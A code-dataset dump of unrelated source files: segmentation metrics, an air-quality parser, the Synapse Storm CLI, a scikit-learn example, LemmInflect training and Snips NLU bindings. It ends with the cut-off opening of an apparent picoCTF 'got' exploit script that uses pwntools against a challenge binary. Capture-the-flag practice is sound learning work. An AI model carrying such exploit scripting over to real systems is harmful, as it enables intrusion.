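#   assert handler.load('notes.txt') == 'hello'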
| 23.142857 | 68 | 0.549383 | 474 | 0.975309 | 0 | 0 | 0 | 0 | 0 | 0 | 29 | 0.059671 |
f1d9fe63dcda29a6aafbbbb348278fbcaa1eb8c3
| 3,449 |
py
|
Python
|
metrics.py
|
mksarker/data_preprocessing
|
dabdb7f3dbf1c4bf5ee49a39aef2cb258539b027
|
[
"MIT"
] | null | null | null |
metrics.py
|
mksarker/data_preprocessing
|
dabdb7f3dbf1c4bf5ee49a39aef2cb258539b027
|
[
"MIT"
] | null | null | null |
metrics.py
|
mksarker/data_preprocessing
|
dabdb7f3dbf1c4bf5ee49a39aef2cb258539b027
|
[
"MIT"
] | null | null | null |
import os
import argparse
import logging
import numpy as np
import SimpleITK as sitk
logging.basicConfig(level=logging.INFO)
from tqdm import tqdm
import cv2
import sys
from PIL import Image
from sklearn import metrics
def Accuracy(y_true, y_pred):
TP = np.sum(np.logical_and(y_pred == 255, y_true == 255))
TN = np.sum(np.logical_and(y_pred == 0, y_true == 0))
FP = np.sum(np.logical_and(y_pred == 255, y_true == 0))
FN = np.sum(np.logical_and(y_pred == 0, y_true == 255))
accuracy = (TP + TN)/float(TP + TN + FP + FN)
return accuracy
def Dice(y_true, y_pred):
"""Returns Dice Similarity Coefficient for ground truth and predicted masks."""
#print(y_true.dtype)
#print(y_pred.dtype)
y_true = np.squeeze(y_true)/255
y_pred = np.squeeze(y_pred)/255
y_true.astype('bool')
y_pred.astype('bool')
intersection = np.logical_and(y_true, y_pred).sum()
return ((2. * intersection.sum()) + 1.) / (y_true.sum() + y_pred.sum() + 1.)
def IoU(Gi,Si):
#print(Gi.shape, Si.shape)
Gi = np.squeeze(Gi)/255
Si = np.squeeze(Si)/255
Gi.astype('bool')
Si.astype('bool')
intersect = 1.0*np.sum(np.logical_and(Gi,Si))
union = 1.0*np.sum(np.logical_or(Gi,Si))
return intersect/union
def Sensitivity(y_true, y_pred):
TP = np.sum(np.logical_and(y_pred == 255, y_true == 255))
TN = np.sum(np.logical_and(y_pred == 0, y_true == 0))
FP = np.sum(np.logical_and(y_pred == 255, y_true == 0))
FN = np.sum(np.logical_and(y_pred == 0, y_true == 255))
sensitivity = TP/float(TP + FN)
return sensitivity
def Specificity(y_true, y_pred):
TP = np.sum(np.logical_and(y_pred == 255, y_true == 255))
TN = np.sum(np.logical_and(y_pred == 0, y_true == 0))
FP = np.sum(np.logical_and(y_pred == 255, y_true == 0))
FN = np.sum(np.logical_and(y_pred == 0, y_true == 255))
specificity = TN/float(TN+FP)
return specificity
def main():
parser = argparse.ArgumentParser(description='ELM line segmentation')
parser.add_argument('--label_dir', type=str, default='/home/vivek/Music/demo/stack/seg',
help='folder of test label')
parser.add_argument('--pred_dir', type=str, default='/home/vivek/Music/demo/stack/pred',
help='folder of pred masks')
args = parser.parse_args()
    # sort both listings so each label file is paired with its matching prediction
    labels = sorted(os.path.join(args.label_dir, x) for x in os.listdir(args.label_dir) if 'raw' not in x)
    preds = sorted(os.path.join(args.pred_dir, x) for x in os.listdir(args.pred_dir) if 'raw' not in x)
mean_dice = []
mean_iou = []
mean_sensitivity = []
mean_specificity = []
mean_accuracy = []
for l, p in zip(labels, preds):
logging.info("Process %s and %s" % (p, l))
G = sitk.GetArrayFromImage(sitk.ReadImage(l))
S = sitk.GetArrayFromImage(sitk.ReadImage(p))
mean_accuracy.append(Accuracy(G, S))
mean_dice.append(Dice(G, S))
mean_iou.append(IoU(G, S))
mean_sensitivity.append(Sensitivity(G, S))
mean_specificity.append(Specificity(G, S))
print ('Mean_Accuracy = ', np.mean(np.array(mean_accuracy)))
print ('Mean_Dice = ', np.mean(np.array(mean_dice)))
print ('Mean_IoU = ', np.mean(np.array(mean_iou)))
print ('Mean_Sensitivity = ', np.mean(np.array(mean_sensitivity)))
print ('Mean_Specificity = ', np.mean(np.array(mean_specificity)))
if __name__ == '__main__':
main()
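# Illustrative command line (paths are hypothetical; both directories must contain
# matching mask files readable by SimpleITK):
#   python metrics.py --label_dir /data/labels --pred_dir /data/preds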
| 35.556701 | 114 | 0.643665 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 456 | 0.132212 |
f1db626c6c51f4c9710e0e6d1e887229859a9043
| 2,757 |
py
|
Python
|
src/app/parser/parser.py
|
IliaValov/SofiaAirPurity
|
71d0b005a9f8f5bfabfae99d1f4f8e1d11825adf
|
[
"MIT"
] | null | null | null |
src/app/parser/parser.py
|
IliaValov/SofiaAirPurity
|
71d0b005a9f8f5bfabfae99d1f4f8e1d11825adf
|
[
"MIT"
] | 1 |
2021-12-02T23:20:51.000Z
|
2021-12-02T23:20:51.000Z
|
src/app/parser/parser.py
|
IliaValov/SofiaAirPurity
|
71d0b005a9f8f5bfabfae99d1f4f8e1d11825adf
|
[
"MIT"
] | 1 |
2022-01-10T15:18:27.000Z
|
2022-01-10T15:18:27.000Z
|
from app.models.enums.station import Station
class Parser:
    """Filters air-quality measurements by station, polluter, level and time range."""
    def __init__(self, data):
        self.data = data
def getDataByStation(self, station):
airDataForStation = {"timeSet": [], "level": [], "airType": [], "invalid": []}
for d in self.data:
if int(d.station) == station:
airDataForStation["timeSet"].append(d.timeset)
airDataForStation["level"].append(d.level)
airDataForStation["airType"].append(int(d.airType))
airDataForStation["invalid"].append(d.isInvalid)
return airDataForStation
def getDataByStationAndPolluter(self, station, polluter):
airDataForStation = {"timeSet": [], "level": [], "invalid": []}
for d in self.data:
if int(d.station) == station and int(d.airType) == polluter:
airDataForStation["timeSet"].append(d.timeset)
airDataForStation["level"].append(d.level)
airDataForStation["invalid"].append(d.isInvalid)
return airDataForStation
def getDataByStationAndLevel(self, station, levelStart, levelEnd):
airDataForStation = {"timeSet": [], "level": [], "invalid": []}
for d in self.data:
if int(d.station) == station and levelStart <= levelEnd and levelStart <= float(d.level) and float(d.level) <= levelEnd:
airDataForStation["timeSet"].append(d.timeset)
airDataForStation["level"].append(d.level)
airDataForStation["invalid"].append(d.isInvalid)
return airDataForStation
def getDataByTimeSet(self, start, end):
airDataForStation = {"station": [], "timeSet": [], "level": [], "airType": [], "invalid": []}
for d in self.data:
if start <= end and start <= d.timeset and d.timeset <= end:
airDataForStation["station"].append(int(d.station))
airDataForStation["timeSet"].append(d.timeset)
airDataForStation["level"].append(d.level)
airDataForStation["airType"].append(int(d.airType))
airDataForStation["invalid"].append(d.isInvalid)
return airDataForStation
def getDataByStationAndTimeSet(self, station, start, end):
airDataForStation = {"timeSet": [], "level": [], "airType": [], "invalid": []}
for d in self.data:
if int(d.station) == station and start <= end and start <= d.timeset and d.timeset <= end:
airDataForStation["timeSet"].append(d.timeset)
airDataForStation["level"].append(d.level)
airDataForStation["airType"].append(int(d.airType))
airDataForStation["invalid"].append(d.isInvalid)
return airDataForStation
| 50.127273 | 132 | 0.602466 | 2,710 | 0.982952 | 0 | 0 | 0 | 0 | 0 | 0 | 322 | 0.116794 |
f1dc37b00019bdcd4fd7800d93e149be0dfe2bdf
| 11,747 |
py
|
Python
|
synapse/tools/storm.py
|
vertexproject/synapse
|
9712e2aee63914441c59ce6cfc060fe06a2e5920
|
[
"Apache-2.0"
] | 216 |
2017-01-17T18:52:50.000Z
|
2022-03-31T18:44:49.000Z
|
synapse/tools/storm.py
|
vertexproject/synapse
|
9712e2aee63914441c59ce6cfc060fe06a2e5920
|
[
"Apache-2.0"
] | 2,189 |
2017-01-17T22:31:48.000Z
|
2022-03-31T20:41:45.000Z
|
synapse/tools/storm.py
|
vertexproject/synapse
|
9712e2aee63914441c59ce6cfc060fe06a2e5920
|
[
"Apache-2.0"
] | 44 |
2017-01-17T16:50:57.000Z
|
2022-03-16T18:35:52.000Z
|
import os
import sys
import copy
import asyncio
import logging
import argparse
import synapse.exc as s_exc
import synapse.common as s_common
import synapse.telepath as s_telepath
import synapse.lib.cli as s_cli
import synapse.lib.cmd as s_cmd
import synapse.lib.node as s_node
import synapse.lib.time as s_time
import synapse.lib.output as s_output
import synapse.lib.parser as s_parser
import synapse.lib.msgpack as s_msgpack
logger = logging.getLogger(__name__)
ERROR_COLOR = '#ff0066'
WARNING_COLOR = '#f4e842'
NODEEDIT_COLOR = "lightblue"
welcome = '''
Welcome to the Storm interpreter!
Local interpreter (non-storm) commands may be executed with a ! prefix:
Use !quit to exit.
Use !help to see local interpreter commands.
'''
class QuitCmd(s_cli.CmdQuit):
'''
Quit the current command line interpreter.
Example:
!quit
'''
_cmd_name = '!quit'
class HelpCmd(s_cli.CmdHelp):
'''
List interpreter extended commands and display help output.
Example:
!help foocmd
'''
_cmd_name = '!help'
class StormCliCmd(s_cli.Cmd):
# cut the Cmd instance over to using argparser and cmdrargv split
def getArgParser(self):
desc = self.getCmdDoc()
pars = s_cmd.Parser(prog=self._cmd_name, description=desc, outp=self._cmd_cli.outp)
return pars
def getCmdOpts(self, text):
pars = self.getArgParser()
argv = s_parser.Parser(text).cmdrargs()
return pars.parse_args(argv[1:])
class RunFileCmd(StormCliCmd):
'''
Run a local storm file.
Example:
!runfile /path/to/file.storm
'''
_cmd_name = '!runfile'
def getArgParser(self):
pars = StormCliCmd.getArgParser(self)
pars.add_argument('stormfile', help='A local file containing a storm query.')
return pars
async def runCmdOpts(self, opts):
if not os.path.isfile(opts.stormfile):
self.printf(f'no such file: {opts.stormfile}')
return
with open(opts.stormfile, 'rb') as fd:
text = fd.read().decode()
self.printf(f'running storm file: {opts.stormfile}')
await self._cmd_cli.storm(text)
class PushFileCmd(StormCliCmd):
'''
Upload a file and create a file:bytes node.
Example:
!pushfile /path/to/file
'''
_cmd_name = '!pushfile'
def getArgParser(self):
pars = StormCliCmd.getArgParser(self)
pars.add_argument('filepath', help='A local file to push to the Cortex.')
return pars
async def runCmdOpts(self, opts):
if not os.path.isfile(opts.filepath):
self.printf(f'no such file: {opts.filepath}')
return
self.printf(f'uploading file: {opts.filepath}')
async with await self._cmd_cli.item.getAxonUpload() as upload:
with open(opts.filepath, 'rb') as fd:
byts = fd.read(10000000)
while byts:
await upload.write(byts)
byts = fd.read(10000000)
size, sha256 = await upload.save()
opts = {'vars': {
'sha256': s_common.ehex(sha256),
'name': os.path.basename(opts.filepath),
}}
await self._cmd_cli.storm('[ file:bytes=$sha256 ] { -:name [:name=$name] }', opts=opts)
class PullFileCmd(StormCliCmd):
'''
Download a file by sha256 and store it locally.
Example:
!pullfile c00adfcc316f8b00772cdbce2505b9ea539d74f42861801eceb1017a44344ed3 /path/to/savefile
'''
_cmd_name = '!pullfile'
def getArgParser(self):
pars = StormCliCmd.getArgParser(self)
pars.add_argument('sha256', help='The SHA256 of the file to download.')
pars.add_argument('filepath', help='The file path to save the downloaded file to.')
return pars
async def runCmdOpts(self, opts):
self.printf(f'downloading sha256: {opts.sha256}')
try:
with s_common.genfile(opts.filepath) as fd:
async for byts in self._cmd_cli.item.getAxonBytes(opts.sha256):
byts = fd.write(byts)
self.printf(f'saved to: {opts.filepath}')
except asyncio.CancelledError as e:
raise
except s_exc.SynErr as e:
self.printf(e.errinfo.get('mesg', str(e)))
class ExportCmd(StormCliCmd):
'''
Export the results of a storm query into a nodes file.
Example:
// Export nodes to a file
!export dnsa.nodes { inet:fqdn#mynodes -> inet:dns:a }
// Export nodes to a file and only include specific tags
!export fqdn.nodes { inet:fqdn#mynodes } --include-tags footag
'''
_cmd_name = '!export'
def getArgParser(self):
pars = StormCliCmd.getArgParser(self)
pars.add_argument('filepath', help='The file path to save the export to.')
pars.add_argument('query', help='The Storm query to export nodes from.')
pars.add_argument('--include-tags', nargs='*', help='Only include the specified tags in output.')
pars.add_argument('--no-tags', default=False, action='store_true', help='Do not include any tags on exported nodes.')
return pars
async def runCmdOpts(self, opts):
self.printf(f'exporting nodes')
queryopts = {}
if opts.include_tags:
queryopts['scrub'] = {'include': {'tags': opts.include_tags}}
if opts.no_tags:
queryopts['scrub'] = {'include': {'tags': []}}
try:
query = opts.query[1:-1]
with s_common.genfile(opts.filepath) as fd:
cnt = 0
async for pode in self._cmd_cli.item.exportStorm(query, opts=queryopts):
byts = fd.write(s_msgpack.en(pode))
cnt += 1
self.printf(f'saved {cnt} nodes to: {opts.filepath}')
except asyncio.CancelledError as e:
raise
except s_exc.SynErr as e:
self.printf(e.errinfo.get('mesg', str(e)))
class StormCli(s_cli.Cli):
histfile = 'storm_history'
async def __anit__(self, item, outp=s_output.stdout, opts=None):
await s_cli.Cli.__anit__(self, item, outp=outp)
self.indented = False
self.cmdprompt = 'storm> '
self.stormopts = {'repr': True}
self.hidetags = False
self.hideprops = False
self._print_skips = []
def initCmdClasses(self):
self.addCmdClass(QuitCmd)
self.addCmdClass(HelpCmd)
self.addCmdClass(ExportCmd)
self.addCmdClass(RunFileCmd)
self.addCmdClass(PullFileCmd)
self.addCmdClass(PushFileCmd)
def printf(self, mesg, addnl=True, color=None):
if self.indented:
s_cli.Cli.printf(self, '')
self.indented = False
return s_cli.Cli.printf(self, mesg, addnl=addnl, color=color)
async def runCmdLine(self, line, opts=None):
if line[0] == '!':
return await s_cli.Cli.runCmdLine(self, line)
await self.storm(line, opts=opts)
async def handleErr(self, mesg):
err = mesg[1]
if err[0] == 'BadSyntax':
pos = err[1].get('at', None)
text = err[1].get('text', None)
tlen = len(text)
mesg = err[1].get('mesg', None)
if pos is not None and text is not None and mesg is not None:
text = text.replace('\n', ' ')
# Handle too-long text
if tlen > 60:
text = text[max(0, pos - 30):pos + 30]
if pos < tlen - 30:
text += '...'
if pos > 30:
text = '...' + text
pos = 33
self.printf(text)
self.printf(f'{" " * pos}^')
self.printf(f'Syntax Error: {mesg}', color=ERROR_COLOR)
return
text = err[1].get('mesg', err[0])
self.printf(f'ERROR: {text}', color=ERROR_COLOR)
def _printNodeProp(self, name, valu):
self.printf(f' {name} = {valu}')
async def storm(self, text, opts=None):
realopts = copy.deepcopy(self.stormopts)
if opts is not None:
realopts.update(opts)
async for mesg in self.item.storm(text, opts=realopts):
mtyp = mesg[0]
if mtyp in self._print_skips:
continue
if mtyp == 'node':
node = mesg[1]
formname, formvalu = s_node.reprNdef(node)
self.printf(f'{formname}={formvalu}')
if not self.hideprops:
for name in sorted(s_node.props(node).keys()):
valu = s_node.reprProp(node, name)
if name[0] != '.':
name = ':' + name
self._printNodeProp(name, valu)
if not self.hidetags:
for tag in sorted(s_node.tagsnice(node)):
valu = s_node.reprTag(node, tag)
tprops = s_node.reprTagProps(node, tag)
printed = False
if valu:
self.printf(f' #{tag} = {valu}')
printed = True
if tprops:
for prop, pval in tprops:
self.printf(f' #{tag}:{prop} = {pval}')
printed = True
if not printed:
self.printf(f' #{tag}')
elif mtyp == 'node:edits':
edit = mesg[1]
count = sum(len(e[2]) for e in edit.get('edits', ()))
s_cli.Cli.printf(self, '.' * count, addnl=False, color=NODEEDIT_COLOR)
self.indented = True
elif mtyp == 'fini':
took = mesg[1].get('took')
took = max(took, 1)
count = mesg[1].get('count')
pers = float(count) / float(took / 1000)
self.printf('complete. %d nodes in %d ms (%d/sec).' % (count, took, pers))
elif mtyp == 'print':
self.printf(mesg[1].get('mesg'))
elif mtyp == 'warn':
info = mesg[1]
warn = info.pop('mesg', '')
xtra = ', '.join([f'{k}={v}' for k, v in info.items()])
if xtra:
warn = ' '.join([warn, xtra])
self.printf(f'WARNING: {warn}', color=WARNING_COLOR)
elif mtyp == 'err':
await self.handleErr(mesg)
def getArgParser():
pars = argparse.ArgumentParser(prog='synapse.tools.storm')
pars.add_argument('cortex', help='A telepath URL for the Cortex.')
pars.add_argument('onecmd', nargs='?', help='A single storm command to run and exit.')
return pars
async def main(argv, outp=s_output.stdout):
pars = getArgParser()
opts = pars.parse_args(argv)
path = s_common.getSynPath('telepath.yaml')
telefini = await s_telepath.loadTeleEnv(path)
async with await s_telepath.openurl(opts.cortex) as proxy:
if telefini is not None:
proxy.onfini(telefini)
async with await StormCli.anit(proxy, outp=outp, opts=opts) as cli:
if opts.onecmd:
await cli.runCmdLine(opts.onecmd)
return
# pragma: no cover
cli.colorsenabled = True
cli.printf(welcome)
await cli.addSignalHandlers()
await cli.runCmdLoop()
if __name__ == '__main__': # pragma: no cover
sys.exit(asyncio.run(main(sys.argv[1:])))
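# Illustrative invocations (the telepath URL and query are hypothetical):
#   python -m synapse.tools.storm tcp://user:pass@cortex.host:27492 "inet:ipv4=1.2.3.4"
#   python -m synapse.tools.storm tcp://user:pass@cortex.host:27492   # interactive prompt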
| 29.589421 | 125 | 0.556823 | 9,937 | 0.845918 | 0 | 0 | 0 | 0 | 7,154 | 0.609007 | 2,665 | 0.226866 |
f1dcbdb70b490e3b7a9741698dbd0c921ce6d7ff
| 374 |
py
|
Python
|
Feature Selection/variance-thresholding-binary-features.py
|
WyckliffeAluga/data-chronicles
|
5219fe9cdbafb9fd7be88727483952c4c13f2790
|
[
"MIT"
] | null | null | null |
Feature Selection/variance-thresholding-binary-features.py
|
WyckliffeAluga/data-chronicles
|
5219fe9cdbafb9fd7be88727483952c4c13f2790
|
[
"MIT"
] | null | null | null |
Feature Selection/variance-thresholding-binary-features.py
|
WyckliffeAluga/data-chronicles
|
5219fe9cdbafb9fd7be88727483952c4c13f2790
|
[
"MIT"
] | 1 |
2021-02-09T12:22:55.000Z
|
2021-02-09T12:22:55.000Z
|
from sklearn.feature_selection import VarianceThreshold
# Create feature matrix with:
# Feature 0: 80% class 0
# Feature 1: 80% class 1
# Feature 2: 60% class 0, 40% class 1
X = [[0, 1, 0],
[0, 1, 1],
[0, 1, 0],
[0, 1, 1],
[1, 0, 0]]
# Run threshold by variance
thresholder = VarianceThreshold(threshold=(.75 * (1 - .75)))
thresholder.fit_transform(X)
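# With this X the per-feature (Bernoulli) variances are p*(1-p) = 0.16, 0.16 and 0.24,
# while the threshold is .75 * (1 - .75) = 0.1875, so only the third column survives:
# the call returns [[0.], [1.], [0.], [1.], [0.]].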
| 23.375 | 60 | 0.628342 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 141 | 0.377005 |
f1dd06b091ae6fa97dc90f3e28bc1d5770af8082
| 1,677 |
py
|
Python
|
scripts/03_BuildLITypeModels/14_TrainLemmaModel.py
|
danielplatt/LemmInflect
|
7db0633098409800fbe7056bdab7d6f5f144cebb
|
[
"MIT"
] | 157 |
2019-05-11T21:17:20.000Z
|
2022-03-21T12:05:12.000Z
|
scripts/03_BuildLITypeModels/14_TrainLemmaModel.py
|
danielplatt/LemmInflect
|
7db0633098409800fbe7056bdab7d6f5f144cebb
|
[
"MIT"
] | 10 |
2019-05-14T19:49:04.000Z
|
2021-06-03T13:15:16.000Z
|
scripts/03_BuildLITypeModels/14_TrainLemmaModel.py
|
danielplatt/LemmInflect
|
7db0633098409800fbe7056bdab7d6f5f144cebb
|
[
"MIT"
] | 20 |
2019-08-21T12:40:51.000Z
|
2021-10-02T15:06:07.000Z
|
#!/usr/bin/python3
import sys
sys.path.insert(0, '../..') # make '../..' first in the lib search path
import gzip
import numpy
from lemminflect.kmodels.ModelLemma import ModelLemma
from lemminflect.kmodels.ModelLemmaInData import ModelLemmaInData
from lemminflect.kmodels.ModelLemmaClasses import ModelLemmaClasses
from lemminflect import config
if __name__ == '__main__':
# Load the lemmatization data
print('Loading ', config.lemma_tcorp_fn)
indata = ModelLemmaInData(config.lemma_tcorp_fn)
print('Loaded {:,} entries'.format(len(indata.entries)))
# Load the lemmatization rules
print('Loading ', config.model_lemma_cl_fn)
rules = ModelLemmaClasses(config.model_lemma_cl_fn)
# Convert data into training format
X = []
Y = []
input_len = ModelLemmaInData.WVEC_LEN
input_letters = ModelLemmaInData.getLetterClasses()
output_rules = rules.rules
for entry in indata.entries:
rule = ModelLemmaClasses.computeSuffixRule(entry.infl, entry.lemma)
idx = rules.getRuleIndex(rule)
vec = ModelLemmaInData.wordToVec(entry.infl, entry.category)
X.append( vec )
Y.append( idx )
X = numpy.asarray(X, dtype='float32')
Y = numpy.asarray(Y, dtype='int32')
print('X.shape= ', X.shape)
print('Y.shape= ', Y.shape)
print()
# Create the model
batch_size = 32
nepochs = 50
model = ModelLemma()
model.create(input_len, input_letters, output_rules)
model.model.summary()
model.train(X, Y, batch_size, nepochs)
print()
print('Saving model to ', config.model_lemma_fn)
model.save(config.model_lemma_fn)
print('done')
| 31.641509 | 75 | 0.690519 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 290 | 0.172928 |
f1dd06cdb53d42d5c3f71ef66179e31f525e4e55
| 9,006 |
py
|
Python
|
python/snips_nlu_parsers/builtin_entities.py
|
f-laurens/snips-nlu-parsers
|
82d24c0b4258acd1191af5d558b7592a18f2dada
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 14 |
2019-04-17T15:10:39.000Z
|
2022-02-14T09:38:47.000Z
|
python/snips_nlu_parsers/builtin_entities.py
|
f-laurens/snips-nlu-parsers
|
82d24c0b4258acd1191af5d558b7592a18f2dada
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 4 |
2019-04-07T19:36:24.000Z
|
2020-05-28T12:46:37.000Z
|
python/snips_nlu_parsers/builtin_entities.py
|
f-laurens/snips-nlu-parsers
|
82d24c0b4258acd1191af5d558b7592a18f2dada
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 43 |
2019-04-20T07:31:57.000Z
|
2022-01-12T16:24:13.000Z
|
# coding=utf-8
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import json
from _ctypes import byref, pointer
from builtins import range, str
from ctypes import c_char_p, string_at
from snips_nlu_parsers.utils import (CStringArray, check_ffi_error, lib,
string_array_pointer, string_pointer)
_ALL_LANGUAGES = None
_SUPPORTED_ENTITIES = dict()
_SUPPORTED_GAZETTEER_ENTITIES = dict()
_SUPPORTED_GRAMMAR_ENTITIES = dict()
_ENTITIES_EXAMPLES = dict()
_ALL_BUILTIN_ENTITIES = None
_ALL_GAZETTEER_ENTITIES = None
_ALL_GRAMMAR_ENTITIES = None
_BUILTIN_ENTITIES_SHORTNAMES = dict()
_COMPLETE_ENTITY_ONTOLOGY = None
_LANGUAGE_ENTITY_ONTOLOGY = dict()
def get_all_languages():
"""Lists all the supported languages"""
global _ALL_LANGUAGES
if _ALL_LANGUAGES is None:
lib.snips_nlu_ontology_supported_languages.restype = CStringArray
array = lib.snips_nlu_ontology_supported_languages()
_ALL_LANGUAGES = set(
array.data[i].decode("utf8") for i in range(array.size))
return _ALL_LANGUAGES
def get_all_builtin_entities():
"""Lists the builtin entities that are supported in at least one
language"""
global _ALL_BUILTIN_ENTITIES
if _ALL_BUILTIN_ENTITIES is None:
lib.snips_nlu_ontology_all_builtin_entities.restype = CStringArray
array = lib.snips_nlu_ontology_all_builtin_entities()
_ALL_BUILTIN_ENTITIES = set(
array.data[i].decode("utf8") for i in range(array.size))
return _ALL_BUILTIN_ENTITIES
def get_all_gazetteer_entities():
"""Lists the gazetteer entities that are supported in at least one
language"""
global _ALL_GAZETTEER_ENTITIES
if _ALL_GAZETTEER_ENTITIES is None:
lib.snips_nlu_ontology_all_gazetteer_entities.restype = CStringArray
array = lib.snips_nlu_ontology_all_gazetteer_entities()
_ALL_GAZETTEER_ENTITIES = set(
array.data[i].decode("utf8") for i in range(array.size))
return _ALL_GAZETTEER_ENTITIES
def get_all_grammar_entities():
"""Lists the grammar entities that are supported in at least one
language"""
global _ALL_GRAMMAR_ENTITIES
if _ALL_GRAMMAR_ENTITIES is None:
lib.snips_nlu_ontology_all_grammar_entities.restype = CStringArray
array = lib.snips_nlu_ontology_all_grammar_entities()
_ALL_GRAMMAR_ENTITIES = set(
array.data[i].decode("utf8") for i in range(array.size))
return _ALL_GRAMMAR_ENTITIES
def get_builtin_entity_shortname(entity):
"""Get the short name of the entity
Examples:
>>> get_builtin_entity_shortname(u"snips/amountOfMoney")
'AmountOfMoney'
"""
global _BUILTIN_ENTITIES_SHORTNAMES
if entity not in _BUILTIN_ENTITIES_SHORTNAMES:
with string_pointer(c_char_p()) as ptr:
exit_code = lib.snips_nlu_ontology_entity_shortname(
entity.encode("utf8"), byref(ptr))
check_ffi_error(exit_code, "Something went wrong when retrieving "
"builtin entity shortname")
result = string_at(ptr)
_BUILTIN_ENTITIES_SHORTNAMES[entity] = result.decode("utf8")
return _BUILTIN_ENTITIES_SHORTNAMES[entity]
def get_supported_entities(language):
"""Lists the builtin entities supported in the specified *language*
Returns:
list of str: the list of entity labels
"""
global _SUPPORTED_ENTITIES
if not isinstance(language, str):
raise TypeError("Expected language to be of type 'str' but found: %s"
% type(language))
if language not in _SUPPORTED_ENTITIES:
with string_array_pointer(pointer(CStringArray())) as ptr:
exit_code = lib.snips_nlu_parsers_supported_builtin_entities(
language.encode("utf8"), byref(ptr))
check_ffi_error(exit_code, "Something went wrong when retrieving "
"supported entities")
array = ptr.contents
_SUPPORTED_ENTITIES[language] = set(
array.data[i].decode("utf8") for i in range(array.size))
return _SUPPORTED_ENTITIES[language]
def get_supported_gazetteer_entities(language):
"""Lists the gazetteer entities supported in the specified *language*
Returns:
list of str: the list of entity labels
"""
global _SUPPORTED_GAZETTEER_ENTITIES
if not isinstance(language, str):
raise TypeError("Expected language to be of type 'str' but found: %s"
% type(language))
if language not in _SUPPORTED_GAZETTEER_ENTITIES:
with string_array_pointer(pointer(CStringArray())) as ptr:
exit_code = \
lib.snips_nlu_parsers_supported_builtin_gazetteer_entities(
language.encode("utf8"), byref(ptr))
check_ffi_error(exit_code, "Something went wrong when retrieving "
"supported gazetteer entities")
array = ptr.contents
_SUPPORTED_GAZETTEER_ENTITIES[language] = set(
array.data[i].decode("utf8") for i in range(array.size))
return _SUPPORTED_GAZETTEER_ENTITIES[language]
def get_supported_grammar_entities(language):
"""Lists the grammar entities supported in the specified *language*
Returns:
list of str: the list of entity labels
"""
global _SUPPORTED_GRAMMAR_ENTITIES
if not isinstance(language, str):
raise TypeError("Expected language to be of type 'str' but found: %s"
% type(language))
if language not in _SUPPORTED_GRAMMAR_ENTITIES:
with string_array_pointer(pointer(CStringArray())) as ptr:
exit_code = lib.snips_nlu_parsers_supported_grammar_entities(
language.encode("utf8"), byref(ptr))
check_ffi_error(exit_code, "Something went wrong when retrieving "
"supported grammar entities")
array = ptr.contents
_SUPPORTED_GRAMMAR_ENTITIES[language] = set(
array.data[i].decode("utf8") for i in range(array.size))
return _SUPPORTED_GRAMMAR_ENTITIES[language]
def get_builtin_entity_examples(builtin_entity_kind, language):
"""Provides some examples of the builtin entity in the specified language
"""
global _ENTITIES_EXAMPLES
if not isinstance(builtin_entity_kind, str):
raise TypeError("Expected `builtin_entity_kind` to be of type 'str' "
"but found: %s" % type(builtin_entity_kind))
if not isinstance(language, str):
raise TypeError("Expected `language` to be of type 'str' but found: %s"
% type(language))
if builtin_entity_kind not in _ENTITIES_EXAMPLES:
_ENTITIES_EXAMPLES[builtin_entity_kind] = dict()
if language not in _ENTITIES_EXAMPLES[builtin_entity_kind]:
with string_array_pointer(pointer(CStringArray())) as ptr:
exit_code = lib.snips_nlu_parsers_builtin_entity_examples(
builtin_entity_kind.encode("utf8"),
language.encode("utf8"), byref(ptr))
check_ffi_error(exit_code, "Something went wrong when retrieving "
"builtin entity examples")
array = ptr.contents
_ENTITIES_EXAMPLES[builtin_entity_kind][language] = list(
array.data[i].decode("utf8") for i in range(array.size))
return _ENTITIES_EXAMPLES[builtin_entity_kind][language]
def get_complete_entity_ontology():
"""Lists the complete entity ontology for all languages in JSON format
"""
global _COMPLETE_ENTITY_ONTOLOGY
if _COMPLETE_ENTITY_ONTOLOGY is None:
with string_pointer(c_char_p()) as ptr:
exit_code = lib.snips_nlu_parsers_complete_entity_ontology_json(byref(ptr))
check_ffi_error(exit_code, "Something went wrong when retrieving "
"complete entity ontology")
json_str = string_at(ptr).decode("utf8")
            _COMPLETE_ENTITY_ONTOLOGY = json.loads(json_str)  # 'encoding' kwarg was removed in Python 3.9
return _COMPLETE_ENTITY_ONTOLOGY
def get_language_entity_ontology(language):
"""Lists the complete entity ontology for the specified language in JSON format
"""
global _LANGUAGE_ENTITY_ONTOLOGY
if language not in _LANGUAGE_ENTITY_ONTOLOGY:
with string_pointer(c_char_p()) as ptr:
exit_code = lib.snips_nlu_parsers_language_entity_ontology_json(
language.encode("utf8"), byref(ptr))
check_ffi_error(exit_code, "Something went wrong when retrieving "
"language entity ontology")
json_str = string_at(ptr).decode("utf8")
            _LANGUAGE_ENTITY_ONTOLOGY[language] = json.loads(json_str)  # 'encoding' kwarg was removed in Python 3.9
return _LANGUAGE_ENTITY_ONTOLOGY[language]
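# Usage sketch (the entity name is illustrative; the exact set depends on the
# installed ontology data):
#   if "snips/amountOfMoney" in get_supported_entities("en"):
#       print(get_builtin_entity_examples("snips/amountOfMoney", "en"))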
| 40.751131 | 87 | 0.67777 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,953 | 0.216855 |
f1decafed3dd9912b1ab456a5f7d5b245e48033e
| 521 |
py
|
Python
|
picoctf-2019/got/shellcode.py
|
onealmond/hacking-lab
|
631e615944add02db3c2afef47bf1de7171eb065
|
[
"MIT"
] | 9 |
2021-04-20T15:28:36.000Z
|
2022-03-08T19:53:48.000Z
|
picoctf-2019/got/shellcode.py
|
onealmond/hacking-lab
|
631e615944add02db3c2afef47bf1de7171eb065
|
[
"MIT"
] | null | null | null |
picoctf-2019/got/shellcode.py
|
onealmond/hacking-lab
|
631e615944add02db3c2afef47bf1de7171eb065
|
[
"MIT"
] | 6 |
2021-06-24T03:25:21.000Z
|
2022-02-20T21:44:52.000Z
|
import os;os.environ['TMPDIR'] = os.path.join(os.environ['HOME'], 'tmp')
import pwn
remote_binary = "/problems/got_5_c5119617c90aa544a639812dbc41e24e/vuln"
def segfault():
    pr = None
    try:
